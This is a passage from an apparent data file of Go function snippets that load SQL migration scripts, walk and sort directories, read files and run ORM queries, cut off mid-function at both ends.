os.Lstat(dest); err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\tif destName := fi.Name(); strings.HasSuffix(destName, \".sql\") && fi.Mode().IsRegular() {\n\t\t\t// Note we intentionally use name, not destName, here. For symlinks we want\n\t\t\t// to return the symlink, not the destination, since the destination could\n\t\t\t// be in a different directory.\n\t\t\tresult = append(result, name)\n\t\t}\n\t}\n\treturn result, nil\n}", "func loadScriptsFromDir(dir string) ([]string, error) {\n\tstats, err := ioutil.ReadDir(dir)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Filter out directories, files without a .sql extension.\n\tvar filtered []string\n\tfor _, f := range stats {\n\t\tif f.IsDir() {\n\t\t\tcontinue\n\t\t}\n\t\text := strings.ToLower(filepath.Ext(f.Name()))\n\t\tif ext == \".sql\" {\n\t\t\tfiltered = append(filtered, filepath.Join(dir, f.Name()))\n\t\t}\n\t}\n\n\t// Sort them, which determines execution order.\n\tsort.Strings(filtered)\n\treturn filtered, nil\n}", "func (d *Driver) LoadAll(db, table string) ([]sql.Index, error) {\n\tvar (\n\t\tindexes []sql.Index\n\t\terrors []string\n\t\troot = filepath.Join(d.root, db, table)\n\t)\n\n\tdirs, err := ioutil.ReadDir(root)\n\tif err != nil {\n\t\tif os.IsNotExist(err) {\n\t\t\treturn indexes, nil\n\t\t}\n\t\treturn nil, err\n\t}\n\tfor _, info := range dirs {\n\t\tif info.IsDir() && !strings.HasPrefix(info.Name(), \".\") {\n\t\t\tidx, err := d.loadIndex(db, table, info.Name())\n\t\t\tif err != nil {\n\t\t\t\tif !errCorruptedIndex.Is(err) {\n\t\t\t\t\terrors = append(errors, err.Error())\n\t\t\t\t}\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tindexes = append(indexes, idx)\n\t\t}\n\t}\n\tif len(errors) > 0 {\n\t\treturn nil, fmt.Errorf(strings.Join(errors, \"\\n\"))\n\t}\n\n\treturn indexes, nil\n}", "func (d *Driver) LoadAll(db, table string) ([]sql.Index, error) {\n\tvar (\n\t\tindexes []sql.Index\n\t\terrors []string\n\t\troot = filepath.Join(d.root, db, table)\n\t)\n\n\tdirs, err := ioutil.ReadDir(root)\n\tif err != nil {\n\t\tif os.IsNotExist(err) {\n\t\t\treturn indexes, nil\n\t\t}\n\t\treturn nil, err\n\t}\n\tfor _, info := range dirs {\n\t\tif info.IsDir() && !strings.HasPrefix(info.Name(), \".\") {\n\t\t\tidx, err := d.loadIndex(db, table, info.Name())\n\t\t\tif err != nil {\n\t\t\t\tif !errCorruptedIndex.Is(err) {\n\t\t\t\t\terrors = append(errors, err.Error())\n\t\t\t\t}\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tindexes = append(indexes, idx)\n\t\t}\n\t}\n\n\tif len(errors) > 0 {\n\t\treturn nil, fmt.Errorf(strings.Join(errors, \"\\n\"))\n\t}\n\n\treturn indexes, nil\n}", "func SourceDir(dirname string) SqlSource {\n\treturn func(tx *sql.Tx) ([]string, error) {\n\t\tvar retStmts []string\n\t\tif err := filepath.Walk(dirname, func(name string, info os.FileInfo, err error) error {\n\t\t\t// skip directory\n\t\t\tif info.IsDir() {\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\t// collect .sql file only\n\t\t\tbase := filepath.Base(name)\n\t\t\tif ext := filepath.Ext(base); ext != \".sql\" {\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\tf, err := os.Open(name)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\t// parse SQL source file\n\t\t\tstmts, err := ParseSQLStatements(f)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tretStmts = append(retStmts, stmts...)\n\t\t\treturn nil\n\t\t}); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treturn retStmts, nil\n\t}\n}", "func (f *FileStore) Load(collection string) ([]string, error) {\n\titems := []string{}\n\tbase := filepath.Join(f.Base, collection)\n\tbase, err := filepath.Abs(base)\n\tif err != nil {\n\t\tlog.Println(\"Error getting abs path to\", collection, err)\n\t\treturn nil, err\n\t}\n\tlog.Println(\"Loading collection\", collection, \"from\", base)\n\tfilepath.Walk(base, func(path string, info os.FileInfo, err error) error {\n\t\tif err != nil {\n\t\t\t// Ignore\n\t\t\tlog.Println(\"store ignoring walk error\", err)\n\t\t\treturn filepath.SkipDir\n\t\t}\n\t\t/*\n\t\t\tif info.IsDir() {\n\t\t\t\tlog.Println(\"skipping dir\", path)\n\t\t\t\treturn filepath.SkipDir\n\t\t\t}\n\t\t*/\n\t\tif filepath.Ext(path) == \".txt\" {\n\t\t\tlog.Println(\"loading item\", path)\n\t\t\ttext, err := ioutil.ReadFile(path)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\titems = append(items, string(text))\n\t\t} else {\n\t\t\tlog.Println(\"skipping non item\", path, filepath.Ext(path))\n\t\t}\n\t\treturn nil\n\t})\n\treturn items, nil\n\n}", "func (manager *Manager) OrderedLoadSchemasFromFiles(filePaths []string) error {\n\tMaxDepth := 8 // maximum number of nested schemas\n\tfor i := MaxDepth; i > 0 && len(filePaths) > 0; i-- {\n\t\trest := make([]string, 0)\n\t\tfor _, filePath := range filePaths {\n\t\t\tif filePath == \"\" {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\terr := manager.LoadSchemaFromFile(filePath)\n\t\t\tif err != nil && err.Error() != \"data isn't map\" {\n\t\t\t\tif i == 1 {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\trest = append(rest, filePath)\n\t\t\t}\n\t\t}\n\t\tfilePaths = rest\n\t}\n\treturn nil\n}", "func (s *Store) loadAll() error {\n\tfiles, err := s.ListFiles(s.Dir)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Failed to list %s: %v\", s.Dir, err)\n\t}\n\n\tfor _, file := range files {\n\t\tfilepath := path.Join(s.Dir, file)\n\t\terr := s.loadPath(filepath)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"Failed to load %s: %v\", filepath, err)\n\t\t}\n\t}\n\treturn nil\n}", "func ParseSqlFile(path string) ([]string, error) {\n\tf, err := os.Open(path)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tscanner := bufio.NewScanner(f)\n\tvar statements []string\n\tvar statement string\n\tfor scanner.Scan() {\n\t\tl := scanner.Text()\n\t\tfor i, w := range l {\n\t\t\tif w == '-' && l[i+1] == '-' {\n\t\t\t\tbreak\n\t\t\t} else if w == ';' {\n\t\t\t\tstatement += string(w)\n\t\t\t\tstatements = append(statements, statement)\n\t\t\t\tstatement = \"\"\n\t\t\t} else {\n\t\t\t\tstatement += string(w)\n\t\t\t}\n\t\t}\n\t}\n\treturn statements, nil\n}", "func getMigrations() *migrate.MemoryMigrationSource {\n\tsource := &migrate.MemoryMigrationSource{}\n\tfn := func(path string, f os.FileInfo, err error) error {\n\t\tif !f.IsDir() && strings.HasSuffix(f.Name(), \".sql\") {\n\t\t\tmigFile, err := os.Open(path)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tmig, err := migrate.ParseMigration(path, migFile)\n\t\t\tmigFile.Close()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tsource.Migrations = append(source.Migrations, mig)\n\t\t}\n\t\treturn nil\n\t}\n\twd, _ := os.Getwd()\n\terr := filepath.Walk(filepath.Join(wd, \"migrations\"), fn)\n\tif err != nil {\n\t\tlog.Panic(err)\n\t\treturn nil\n\t}\n\treturn source\n}", "func LoadMigrations() ([]*Migration, error) {\n\tfiles, err := ioutil.ReadDir(migrateName)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tm := []*Migration{}\n\n\tfor _, fn := range files {\n\t\tg, err := ReadMigration(fn.Name())\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tm = append(m, g)\n\t}\n\n\treturn m, nil\n}", "func (d *gluster) readDirSorted(dirname string, followLink bool) ([]*mEntry, error) {\n\tf, err := d.vol.Open(dirname)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer f.Close()\n\tentries, err := f.Readdir(0)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tmEntries := make([]*mEntry, 0, len(entries))\n\tfor _, e := range entries {\n\t\tname := e.Name()\n\t\tif name == \".\" || name == \"..\" {\n\t\t\tcontinue\n\t\t}\n\t\tif e.IsDir() {\n\t\t\tmEntries = append(mEntries, &mEntry{nil, name + dirSuffix, e, false})\n\t\t} else if !e.Mode().IsRegular() && followLink {\n\t\t\tfi, err := d.vol.Stat(filepath.Join(dirname, name))\n\t\t\tif err != nil {\n\t\t\t\tmEntries = append(mEntries, &mEntry{nil, name, e, true})\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif fi.IsDir() {\n\t\t\t\tname += dirSuffix\n\t\t\t}\n\t\t\tmEntries = append(mEntries, &mEntry{nil, name, fi, false})\n\t\t} else {\n\t\t\tmEntries = append(mEntries, &mEntry{nil, name, e, !e.Mode().IsRegular()})\n\t\t}\n\t}\n\tsort.Slice(mEntries, func(i, j int) bool { return mEntries[i].Name() < mEntries[j].Name() })\n\treturn mEntries, err\n}", "func GetAllFiles(dirPth string, abs bool) (files []string, err error) {\n\tvar dirs []string\n\tdir, err := ioutil.ReadDir(dirPth)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tPthSep := string(os.PathSeparator)\n\n\tfor _, fi := range dir {\n\t\tif fi.IsDir() {\n\t\t\tdirs = append(dirs, dirPth+PthSep+fi.Name())\n\t\t\tGetAllFiles(dirPth+PthSep+fi.Name(), abs)\n\t\t} else {\n\t\t\tif abs {\n\t\t\t\tfiles = append(files, dirPth+PthSep+fi.Name())\n\t\t\t} else {\n\t\t\t\tfiles = append(files, PthSep+fi.Name())\n\t\t\t}\n\n\t\t}\n\t}\n\n\tfor _, table := range dirs {\n\t\ttemp, _ := GetAllFiles(table, abs)\n\t\tfor _, temp1 := range temp {\n\t\t\tfiles = append(files, temp1)\n\t\t}\n\t}\n\n\treturn files, nil\n}", "func Migrations(dir string) Option {\n\treturn optionFn(func(f Fataler, data *optionData) {\n\t\terr := filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif filepath.Ext(path) != \".sql\" || info.IsDir() {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tdata.schemaPaths = append(data.schemaPaths, path)\n\t\t\treturn nil\n\t\t})\n\t\tif err != nil {\n\t\t\tf.Fatal(err)\n\t\t}\n\t})\n}", "func (c *Client) collectMigrations(dirpath string, current, target int64) (Migrations, error) {\n\tvar migrations Migrations\n\n\t// only load migrations from file if a path is explicitly provided\n\tif dirpath != \"\" {\n\t\t// extract the numeric component of each migration,\n\t\t// filter out any uninteresting files,\n\t\t// and ensure we only have one file per migration version.\n\t\tsqlMigrations, err := filepath.Glob(dirpath + \"/*.sql\")\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tfor _, file := range sqlMigrations {\n\t\t\tv, err := NumericComponent(file)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tif versionFilter(v, current, target) {\n\t\t\t\tmigration := &Migration{Version: v, Next: -1, Previous: -1, Source: file}\n\t\t\t\tmigrations = append(migrations, migration)\n\t\t\t}\n\t\t}\n\t}\n\n\tfor _, migration := range c.Migrations {\n\t\tv, err := NumericComponent(migration.Source)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif versionFilter(v, current, target) {\n\t\t\tmigrations = append(migrations, migration)\n\t\t}\n\t}\n\n\tmigrations = sortAndConnectMigrations(migrations)\n\n\treturn migrations, nil\n}", "func LoadDatasets(dbPath, key string) []*Dataset {\n\tvar datasets []*Dataset\n\n\tdirs, err := ioutil.ReadDir(dbPath)\n\tif err != nil {\n\t\tlog.Error(err.Error())\n\t\treturn datasets\n\t}\n\n\tfor _, dir := range dirs {\n\t\tif !strings.HasPrefix(dir.Name(), \".\") && dir.IsDir() {\n\t\t\tds := &Dataset{\n\t\t\t\tpath: filepath.Join(dbPath, dir.Name()),\n\t\t\t\tlastModified: dir.ModTime(),\n\t\t\t\tkey: key,\n\t\t\t}\n\n\t\t\tdatasets = append(datasets, ds)\n\t\t}\n\t}\n\treturn datasets\n}", "func DirSlice(t *testing.T, path string) []Case {\n\tsl := []Case{}\n\tfor c := range Dir(t, path) {\n\t\tsl = append(sl, c)\n\t}\n\treturn sl\n}", "func LoadDir(dir string) ([]DirEntry, error) {\n\tvar dirEntries []DirEntry\n\n\terr := filepath.WalkDir(\n\t\tdir,\n\t\tfunc(path string, d os.DirEntry, err error) error {\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tfileInfo, err := d.Info()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\trelativePath, err := filepath.Rel(dir, path)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif relativePath == \".\" {\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\tdirEntry := DirEntry{\n\t\t\t\tName: relativePath,\n\t\t\t\tPermissions: fileInfo.Mode().Perm(),\n\t\t\t}\n\n\t\t\tif !fileInfo.IsDir() {\n\t\t\t\t// Read file contents\n\t\t\t\tfileContent, err := os.ReadFile(path)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\tdirEntry.Content = base64.StdEncoding.EncodeToString(fileContent)\n\t\t\t\tdirEntry.IsFile = true\n\t\t\t}\n\n\t\t\tdirEntries = append(dirEntries, dirEntry)\n\t\t\treturn nil\n\t\t})\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn dirEntries, nil\n}", "func (j *juiceFS) readDirSorted(dirname string) ([]*mEntry, syscall.Errno) {\n\tf, err := j.jfs.Open(ctx, dirname, 0)\n\tif err != 0 {\n\t\treturn nil, err\n\t}\n\tdefer f.Close(ctx)\n\tentries, err := f.ReaddirPlus(ctx, 0)\n\tif err != 0 {\n\t\treturn nil, err\n\t}\n\tmEntries := make([]*mEntry, len(entries))\n\tfor i, e := range entries {\n\t\tfi := fs.AttrToFileInfo(e.Inode, e.Attr)\n\t\tif fi.IsDir() {\n\t\t\tmEntries[i] = &mEntry{fi, string(e.Name) + dirSuffix, false}\n\t\t} else if fi.IsSymlink() {\n\t\t\t// follow symlink\n\t\t\tfi2, err := j.jfs.Stat(ctx, filepath.Join(dirname, string(e.Name)))\n\t\t\tif err != 0 {\n\t\t\t\tmEntries[i] = &mEntry{fi, string(e.Name), true}\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tname := string(e.Name)\n\t\t\tif fi2.IsDir() {\n\t\t\t\tname += dirSuffix\n\t\t\t}\n\t\t\tmEntries[i] = &mEntry{fi2, name, true}\n\t\t} else {\n\t\t\tmEntries[i] = &mEntry{fi, string(e.Name), false}\n\t\t}\n\t}\n\tsort.Slice(mEntries, func(i, j int) bool { return mEntries[i].name < mEntries[j].name })\n\treturn mEntries, err\n}", "func loadDirectory(dir string, callback func(*ParseData) error) error {\n\tglob := path.Join(dir, \"*.md\")\n\tdirEntries, err := filepath.Glob(glob)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tlogrus.WithFields(logrus.Fields{\n\t\t\"glob\": glob,\n\t\t\"entries\": dirEntries,\n\t}).Debug(\"scanning directory\")\n\tfor _, entry := range dirEntries {\n\t\t// Parse file entry\n\t\tdata, err := parseFile(entry)\n\t\tif err != nil {\n\t\t\tlogrus.WithField(\"file\", entry).Warn(\"failed to parse\")\n\t\t\tcontinue\n\t\t}\n\n\t\terr = callback(data)\n\t\tif err != nil {\n\t\t\tlogrus.WithField(\"file\", entry).Warn(\"failed to callback\")\n\t\t\tcontinue\n\t\t}\n\t}\n\n\treturn nil\n}", "func load(ctx context.Context, ds *localdatasource.DataSource, pathList string) {\n\tpaths := strings.Split(pathList, \",\")\n\tloaded := len(paths)\n\tfor _, path := range paths {\n\t\tvar err error\n\t\tif *gopathMode {\n\t\t\terr = ds.LoadFromGOPATH(ctx, path)\n\t\t} else {\n\t\t\terr = ds.Load(ctx, path)\n\t\t}\n\t\tif err != nil {\n\t\t\tlog.Error(ctx, err)\n\t\t\tloaded--\n\t\t}\n\t}\n\n\tif loaded == 0 {\n\t\tlog.Fatalf(ctx, \"failed to load module(s) at %s\", pathList)\n\t}\n}", "func Ls(dir string) ([]os.FileInfo, error) {\n\tfiles, err := ioutil.ReadDir(dir)\n\tsort.Sort(FileInfoByType(files))\n\treturn files, err\n}", "func (p *FileMap) loadFilesRecursively(cwd string) error {\n\tfileList, err := ioutil.ReadDir(cwd)\n\n\tif err != nil {\n\t\terr = StringError{s: \"ERROR: Can't open \\\"\" + cwd + \"\\\" directory!\"}\n\t\treturn err\n\t}\n\n\tfor _, f := range fileList {\n\t\tfileName := f.Name()\n\n\t\tif f.IsDir() {\n\t\t\terr := p.loadFilesRecursively(cwd + fileName + \"/\")\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(err.Error())\n\t\t\t\tcontinue\n\t\t\t}\n\t\t} else {\n\t\t\tbaseName, ext := getBaseAndExt(fileName)\n\n\t\t\t_, err := p.load(cwd+baseName, ext)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(err.Error())\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tfmt.Println(\"INFO: Loaded file: \" + cwd + filepath.Base(fileName))\n\t\t}\n\t}\n\treturn nil\n}", "func (l Util) List(root string, buff []string, rec bool, ext string) (r []string, err error) {\n\tr = buff\n\tentries, err := l.ReadDir(l.path(root))\n\tif err != nil {\n\t\treturn\n\t}\n\n\tfor _, e := range entries {\n\t\tp := path.Join(root, e.Name())\n\t\tif e.IsDir() {\n\t\t\tif rec {\n\t\t\t\tr, err = l.List(p, r, true, ext)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tidx := strings.LastIndex(e.Name(), \".\")\n\t\t\tif idx == -1 {\n\t\t\t\tif ext == \"\" {\n\t\t\t\t\tr = append(r, p)\n\t\t\t\t}\n\t\t\t} else if ext == \"\" || e.Name()[idx+1:] == ext {\n\t\t\t\tr = append(r, p)\n\t\t\t}\n\n\t\t}\n\t}\n\n\treturn\n}", "func (m *migrations) getMigrations() (Migrations, error) {\n\tnames := m.fs.Files()\n\tmm := make(map[int64]*Migration)\n\tfor _, name := range names {\n\t\tfields := parseScriptName(name)\n\t\tif len(fields) == 0 {\n\t\t\treturn nil, errors.Errorf(\"Invalid migration name '%s' should be like /path/to/M023_MyMigration.sql\", name)\n\t\t}\n\n\t\tid, err := strconv.ParseInt(fields[\"id\"], 10, 64)\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrapf(err, \"Invalid migration id '%s' for '%s'\", fields[\"id\"], name)\n\t\t}\n\n\t\tif m, exists := mm[id]; exists {\n\t\t\treturn nil, errors.Errorf(\"Duplicate migration ids: '%s' and '%s' have the same id\", m.Name, fields[\"name\"])\n\t\t}\n\n\t\tcontents, err := m.loadScript(name)\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrapf(err, \"Error loading script '%s'\", name)\n\t\t}\n\n\t\tmm[id] = &Migration{\n\t\t\tId: id,\n\t\t\tType: fields[\"type\"],\n\t\t\tName: fields[\"name\"],\n\t\t\tScript: string(contents),\n\t\t}\n\t}\n\tresult := getSortedMigrations(mm)\n\treturn result, nil\n}", "func generateSQLFiles(migrations map[string]string) (string, error) {\n\tbasepath := path.Join(os.TempDir(), \"db\", generator.ID(\"dbm\"))\n\t_, err := fileutil.EnsureDir(basepath, 0777)\n\n\tif nil != err {\n\t\treturn \"\", fmt.Errorf(\"Unable to create directory %s\\n%s\", basepath, err)\n\t}\n\n\tfor filename, data := range migrations {\n\t\tf, err := os.Create(path.Join(basepath, filename))\n\t\tif nil != err {\n\t\t\treturn \"\", fmt.Errorf(\"Unable to write %s to %s for database migrations\\n%s\", filename, basepath, err)\n\t\t}\n\t\tdefer f.Close()\n\t\tf.WriteString(data)\n\t}\n\n\treturn fmt.Sprintf(\"file://%s\", basepath), nil\n}", "func readComponents(dir string) ([]Component, error) {\n\tvar components []Component\n\tentries, err := ioutil.ReadDir(dir)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, entry := range entries {\n\t\tif entry.IsDir() {\n\t\t\tsubComponents, err := readComponents(path.Join(dir, entry.Name()))\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tcomponents = append(components, subComponents...)\n\t\t\tcontinue\n\t\t}\n\n\t\tp := path.Join(dir, entry.Name())\n\t\tcontent, err := ioutil.ReadFile(p)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tcomponents = append(components, Component{\n\t\t\tPath: p,\n\t\t\tContent: string(content),\n\t\t})\n\t}\n\n\treturn components, nil\n}", "func fetchAll(root string) (sliceDir []os.FileInfo, targetInfo os.FileInfo, errFunc error) {\n\tsliceDir, errFunc = ioutil.ReadDir(root)\n\tif errFunc != nil {\n\t\t// Not a directory so probably a file ? Check for it\n\t\ttargetInfo, errFunc = os.Stat(root)\n\t\tif errFunc != nil {\n\t\t\tfmt.Println(redB(\":: [ERROR]\"), color.HiRedString(\"Could not read the file(s), sad story!\"))\n\t\t\ttargetInfo = nil\n\t\t}\n\t\tsliceDir = nil\n\t}\n\treturn\n}", "func (filesStorageL) LoadFile(e boil.Executor, singular bool, maybeFilesStorage interface{}, mods queries.Applicator) error {\n\tvar slice []*FilesStorage\n\tvar object *FilesStorage\n\n\tif singular {\n\t\tobject = maybeFilesStorage.(*FilesStorage)\n\t} else {\n\t\tslice = *maybeFilesStorage.(*[]*FilesStorage)\n\t}\n\n\targs := make([]interface{}, 0, 1)\n\tif singular {\n\t\tif object.R == nil {\n\t\t\tobject.R = &filesStorageR{}\n\t\t}\n\t\targs = append(args, object.FileID)\n\n\t} else {\n\tOuter:\n\t\tfor _, obj := range slice {\n\t\t\tif obj.R == nil {\n\t\t\t\tobj.R = &filesStorageR{}\n\t\t\t}\n\n\t\t\tfor _, a := range args {\n\t\t\t\tif a == obj.FileID {\n\t\t\t\t\tcontinue Outer\n\t\t\t\t}\n\t\t\t}\n\n\t\t\targs = append(args, obj.FileID)\n\n\t\t}\n\t}\n\n\tquery := NewQuery(qm.From(`files`), qm.WhereIn(`id in ?`, args...))\n\tif mods != nil {\n\t\tmods.Apply(query)\n\t}\n\n\tresults, err := query.Query(e)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to eager load File\")\n\t}\n\n\tvar resultSlice []*File\n\tif err = queries.Bind(results, &resultSlice); err != nil {\n\t\treturn errors.Wrap(err, \"failed to bind eager loaded slice File\")\n\t}\n\n\tif err = results.Close(); err != nil {\n\t\treturn errors.Wrap(err, \"failed to close results of eager load for files\")\n\t}\n\tif err = results.Err(); err != nil {\n\t\treturn errors.Wrap(err, \"error occurred during iteration of eager loaded relations for files\")\n\t}\n\n\tif len(filesStorageAfterSelectHooks) != 0 {\n\t\tfor _, obj := range resultSlice {\n\t\t\tif err := obj.doAfterSelectHooks(e); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\tif len(resultSlice) == 0 {\n\t\treturn nil\n\t}\n\n\tif singular {\n\t\tforeign := resultSlice[0]\n\t\tobject.R.File = foreign\n\t\tif foreign.R == nil {\n\t\t\tforeign.R = &fileR{}\n\t\t}\n\t\tforeign.R.FilesStorages = append(foreign.R.FilesStorages, object)\n\t\treturn nil\n\t}\n\n\tfor _, local := range slice {\n\t\tfor _, foreign := range resultSlice {\n\t\t\tif local.FileID == foreign.ID {\n\t\t\t\tlocal.R.File = foreign\n\t\t\t\tif foreign.R == nil {\n\t\t\t\t\tforeign.R = &fileR{}\n\t\t\t\t}\n\t\t\t\tforeign.R.FilesStorages = append(foreign.R.FilesStorages, local)\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func (db *Database) dbFilePartsForDbFile(f DbFile) []DbFilePart {\n\tvar parts []DbFilePart\n\trows, err := db.Query(\"SELECT * FROM FilePart WHERE parentId=$1 ORDER BY fileIndex ASC\", f.id)\n\tif err != nil {\n\t\tlog.Fatalln(\"Unable to get file part for file id\", f.id, \":\", err)\n\t}\n\tdefer rows.Close()\n\tfor rows.Next() {\n\t\tparts = append(parts, NewDbFilePart(rows))\n\t}\n\treturn parts\n}", "func (adapter Adapter) GetPagesFromDirectory(id int) ([]core.Page, error) {\n\tpages := []core.Page{}\n\n\terr := adapter.\n\t\tSession.\n\t\tModel(&pages).\n\t\tWhere(\"parent_id = ?\", id).\n\t\tRelation(\"Fields\").\n\t\tSelect()\n\n\treturn pages, err\n}", "func LoadAll() ([]*BlogPost, error) {\n\tfiles, err := ioutil.ReadDir(\"www/posts/\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tposts := make([]*BlogPost, 0, len(files))\n\tfor _, file := range files {\n\t\tif !file.IsDir() {\n\t\t\tpost, err := Load(\"www/posts/\" + file.Name())\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t} else {\n\t\t\t\tposts = append(posts, post)\n\t\t\t}\n\t\t}\n\t}\n\treturn posts, nil\n}", "func addPages (dir string) (Storage) {\n\t//init empty Store\n\tstore := Storage {}\n\t//all files with db found\n\tdbs := _get_all_dbs(config_dbdir)\n\n\tpage_num := 0\n\tfor _, db_name := range (dbs){\n\t\t//got lines from each file\n\t\tlines, er := File2lines(config_dbdir+db_name)\n\t\tif er != nil{\n\t\t\tlog.Fatal(er)\n\t\t}\n\t\t//check if file_size is correct\n\t\tif len(lines) > config_page_size*config_file_size {\n\t\t\tlog.Fatal(\"too much strings in file!!\\n\")\n\t\t}\n\t\t//get number of pages in current file\n\t\tfile_size := int(len(lines)/config_page_size)\n\t\tif len(lines) % config_page_size != 0 {\n\t\t\tfile_size += 1\n\t\t}\n\t\t//page counter inside file\n\t\tcur_page := 0\n\t\t//for all pages in file\n\t\tfor cur_page < file_size {\n\t\t\t//append page to Storage\n\t\t\tif cur_page != file_size -1{\n\t\t\t\tstore = append(store, Page {\n\t\t\t\t\tpageNum: page_num,\n\t\t\t\t\tfileName: db_name,\n\t\t\t\t\toffset: cur_page*config_page_size,\n\t\t\t\t\tcontent: append(lines[cur_page*config_page_size:(cur_page+1)*config_page_size]),\n\t\t\t\t\tneed_to_write: false})\n\t\t\t} else{\n\t\t\t\tstore = append(store, Page {\n\t\t\t\t\tpageNum: page_num,\n\t\t\t\t\tfileName: db_name,\n\t\t\t\t\toffset: cur_page*config_page_size,\n\t\t\t\t\tcontent: append(lines[cur_page*config_page_size:len(lines)]),\n\t\t\t\t\tneed_to_write: false})\n\t\t\t}\n\t\t\tcur_page += 1\n\t\t\tpage_num += 1\n\t\t}\n\n\t}\n\treturn store\n}", "func SplitSQLStatements(r io.ReadSeeker, direction bool) ([]string, error) {\n\t_, err := r.Seek(0, 0)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar buf bytes.Buffer\n\tscanner := bufio.NewScanner(r)\n\n\t// track the count of each section\n\t// so we can diagnose scripts with no annotations\n\tupSections := 0\n\tdownSections := 0\n\n\tstatementEnded := false\n\tignoreSemicolons := false\n\tdirectionIsActive := false\n\n\tstmts := make([]string, 0)\n\n\tfor scanner.Scan() {\n\n\t\tline := scanner.Text()\n\n\t\t// handle any migrate-specific commands\n\t\tif strings.HasPrefix(line, sqlCmdPrefix) {\n\t\t\tcmd := strings.TrimSpace(line[len(sqlCmdPrefix):])\n\t\t\tswitch cmd {\n\t\t\tcase \"Up\":\n\t\t\t\tdirectionIsActive = (direction == true)\n\t\t\t\tupSections++\n\t\t\t\tbreak\n\n\t\t\tcase \"Down\":\n\t\t\t\tdirectionIsActive = (direction == false)\n\t\t\t\tdownSections++\n\t\t\t\tbreak\n\n\t\t\tcase \"StatementBegin\":\n\t\t\t\tif directionIsActive {\n\t\t\t\t\tignoreSemicolons = true\n\t\t\t\t}\n\t\t\t\tbreak\n\n\t\t\tcase \"StatementEnd\":\n\t\t\t\tif directionIsActive {\n\t\t\t\t\tstatementEnded = (ignoreSemicolons == true)\n\t\t\t\t\tignoreSemicolons = false\n\t\t\t\t}\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\n\t\tif !directionIsActive {\n\t\t\tcontinue\n\t\t}\n\n\t\tif _, err := buf.WriteString(line + \"\\n\"); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\t// Wrap up the two supported cases: 1) basic with semicolon; 2) psql statement\n\t\t// Lines that end with semicolon that are in a statement block\n\t\t// do not conclude statement.\n\t\tif (!ignoreSemicolons && endsWithSemicolon(line)) || statementEnded {\n\t\t\tstatementEnded = false\n\t\t\tstmts = append(stmts, buf.String())\n\t\t\tbuf.Reset()\n\t\t}\n\t}\n\n\tif err := scanner.Err(); err != nil {\n\t\treturn nil, err\n\t}\n\n\t// diagnose likely migration script errors\n\tif ignoreSemicolons {\n\t\treturn nil, errors.New(\"ERROR: saw '-- +migrate StatementBegin' with no matching '-- +migrate StatementEnd'\")\n\t}\n\n\tif upSections == 0 && downSections == 0 {\n\t\treturn nil, errors.New(`ERROR: no Up/Down annotations found, so no statements were executed.\n\t\t\tSee https://github.com/rubenv/sql-migrate for details.`)\n\t}\n\n\treturn stmts, nil\n}", "func FilesSortedByOldest(path string) ([]string, error) {\n\toutputFiles := []string{}\n\tmixedfiles, err := 